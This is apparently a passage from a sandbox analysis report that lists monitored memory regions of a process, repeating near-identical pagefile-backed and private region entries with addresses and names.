0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15133 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15134 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15135 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15136 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15137 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15138 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15139 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15140 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15141 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15142 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15143 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15144 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15145 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15146 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15147 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15148 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15149 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15150 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15151 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15152 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15153 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15154 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15155 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15156 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15157 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15158 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15159 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15160 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15161 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15162 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15163 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15164 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15165 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15166 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15167 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15168 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15169 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15170 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15171 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 15172 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 15173 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15174 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15175 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15176 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15177 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15178 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15179 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15180 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15181 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15182 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15183 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15184 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15185 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15186 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15187 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15188 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15189 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15190 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15191 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15192 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15193 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15194 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15195 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15196 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15197 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15198 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15199 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15200 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15201 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15202 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15203 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15204 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15205 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15206 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15207 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15208 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15209 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15210 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15211 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15212 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15213 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15214 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15215 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15216 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15217 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15218 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15219 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15220 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15221 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15222 start_va = 0x4140000 end_va = 0x4140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 15223 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15224 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15225 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15226 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15227 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15228 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15229 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15230 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15231 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15232 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15233 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15234 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15235 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15236 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15237 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15238 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15239 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15240 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15241 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15242 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15243 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15244 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15245 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15246 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15247 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15248 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15249 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15250 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15251 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15252 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15253 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15254 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15255 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15256 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15257 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15258 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15259 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15260 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15261 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15262 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15263 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15264 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15265 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15266 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15267 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15268 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15269 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15270 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15271 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15272 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15273 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15274 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15275 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15276 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15277 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15278 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15279 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15280 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15281 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15282 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 15283 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 15284 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15285 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15286 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15287 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15288 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15289 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15290 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15291 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15292 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15293 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15294 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15295 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15296 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15297 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15298 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15299 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15300 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15301 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15302 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15303 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15304 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15305 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15306 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15307 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15308 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15309 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15310 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15311 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15312 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15313 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15314 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15315 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15316 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15317 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15318 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15319 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 15320 start_va 